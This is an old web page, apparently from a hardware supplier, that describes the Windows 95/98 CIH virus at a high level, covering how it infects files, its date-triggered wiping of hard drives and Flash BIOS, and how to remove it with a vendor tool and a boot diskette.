|
Brought to you by:
Suppliers of:
|
|
|
| |
CIH is a Windows '95/98 virus that has spread worldwide.
The virus spreads quietly, and attacks on April 26th (another version of this virus attacks on the 26th of every month). The virus is considered fairly destructive as it wipes the contents of the Hard Drives and Flash BIOS. |
| |
Credit:
Information about the CIH virus is available at the McAffee Virus Information Center: http://vil.mcafee.com/vil/vfi_4251.asp
For information about the AntiViral Toolkit Pro, visit: http://www.avp.com
|
| |
The CIH Virus is a Windows '95/98 (it does not work on Windows 3.11, Windows NT or DOS). It was first posted on a conference site in Taiwan, and quickly spread around the world. The virus is 1k in size, and it infects EXE files as they are opened by the operating system.
The size of the infected file does not change, due to clever design of the virus - the virus looks for empty "space" in the EXE file (portable executable files are composed of sections with a fixed size. Since the code is written in blocks, there are usually empty spaces in the end of each such section to "align" the section to the correct size).
When the executable is ran, the virus loads itself into memory, and cleverly jumps from Ring 3 (a logical "ring" where standard applications are executed) to Ring 0 (a logical place where the privileged operating system code runs). This enables it to hook the file open routines.
When the virus is triggered it erases all data on all the hard drives in the system, using direct writing functions (this bypasses the BIOS "virus protection" setting that protects the boot sector and master boot record). After erasing the drives, the virus tries to programmatically overwrite the Flash BIOS memory - this is possible in most modern motherboards.
The result of this attack is an inoperable computer with all its data gone.
There are two main versions of this Virus that were found "in the wild". The first version called CIH 1.2 - attacks on April 26th. The second version, called CIH 1.4 (sometimes referred to as TATUNG) attacks on the 26th of every month.
Most recent anti virus applications detect and remove CIH. Central Command Inc. offers a special version of AntiViral Toolkit Pro called AVPLite, that detects and cleans CIH.
To use it, download the toolkit from: ftp://ftp.avp.com/pub/nocih/nocih.exe (CIH will not infect this file). Then, Insert a blank diskette into your floppy drive and type:
Nocih.exe a: (where a: is the floppy drive).
Now, make the diskette bootable by typing:
sys a:
Then, copy the file HIMEM.SYS to the floppy by typing:
copy c:\windows\himem.sys a:
Now write-protect the diskette, power down the machine and power it up again with the diskette in the floppy drive to scan for the virus.
|
|
|
|
|
